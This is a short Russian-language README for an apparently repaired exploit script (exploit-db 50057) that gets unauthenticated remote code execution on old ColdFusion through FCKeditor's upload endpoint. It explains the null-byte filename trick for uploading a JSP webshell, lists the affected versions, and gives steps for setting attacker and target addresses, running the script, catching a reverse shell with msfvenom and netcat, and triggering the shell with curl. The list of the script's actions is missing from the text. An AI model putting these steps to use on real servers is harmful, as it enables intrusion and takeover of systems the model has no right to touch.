
исправление для неработающего скрипта эксплойта на exploitdb (50057.py)
Неаутентифицированное удалённое выполнение кода через загрузку произвольных файлов в компоненте FCKeditor, входящем в состав ColdFusion. Конечная точка загрузки файлов принимает инъекцию нулевого байта в параметре имени файла, что позволяет загрузить JSP-вебшелл и выполнить его непосредственно сервером.
| Версия | Статус |
|---|
| ColdFusion 8.0 | Уязвима |
| ColdFusion 8.0.1 | Уязвима |
| ColdFusion 9.0 | Уязвима* |
| ColdFusion MX 6.x | Уязвима |
| ColdFusion MX 7.x | Уязвима |
| ColdFusion 9.0.1+ | Исправлена |
| ColdFusion 10+ | Не затронута |
*ColdFusion 9.0 уязвима, если компонент FCKeditor не удалён/не обновлён.
Патч: Adobe Security Bulletin APSB09-09 (июль 2009).
Отредактируйте переменные в начале скрипта:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
Запустите:
python3 poc.py
Скрипт выполнит следующие действия:
Если шелл не появится в течение нескольких секунд, активируйте его вручную:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
Имя файла выводится в stdout после загрузки.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm